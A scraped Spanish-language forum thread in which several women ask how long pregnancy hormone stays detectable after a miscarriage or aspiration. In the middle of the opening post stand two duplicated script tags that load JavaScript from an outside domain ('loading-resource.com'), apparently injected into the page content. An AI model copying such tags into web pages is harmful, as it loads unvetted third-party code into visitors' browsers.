Qué resultado daría un test de embarazo después de un aborto espontáneo
Otra vez, me estuviste informando ayer sobre los test de embarazo. Mientras espero a poder hacerlo le estoy dando demasiadas vueltas a la cabeza, por ejemplo se me plantea esta duda: si se produce la implantación, pero poco después se produce un aborto espontáneo, ¿los niveles en sangre seguirían marcando embarazo unas 24 horas después del aborto, por ejemplo, o ya no? Muchas gracias por la información, espero quitarme pronto los nervios una vez que haga el test
<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Respuesta de MariLuz Blanco
1
Buenas, nececito una opinion.En cuanto tiempo desaparece la hormona del sangre despues de un aborto.Estoy buscando un embarazo si no espere que me baje ninguna regla. Tengo 5semanas y unos dias despues de una aspiracion y no se si hacerme la prueba. Gracias - Silvia Cotul
Buenas, hace 20 días tuve un sangrado horrible on mucho dolor y coágulos fui al hospital y me dijeron que tenia amenaza de aborto me recetaron pastillas y reposo li cual cumplí! 20 días después fui a realizarme un eco a chequear que toda estuviera bien y resulta que ya no tenia saco gestacional lo expulse en medio del sangrado... fui nuevamente al hospital y mi prueba de embarazo dio negativo... mi pregunta es; ¿Es normal que haya salido negativa después de 20 días? Gracias - Andrea Anais Hernandez Quintana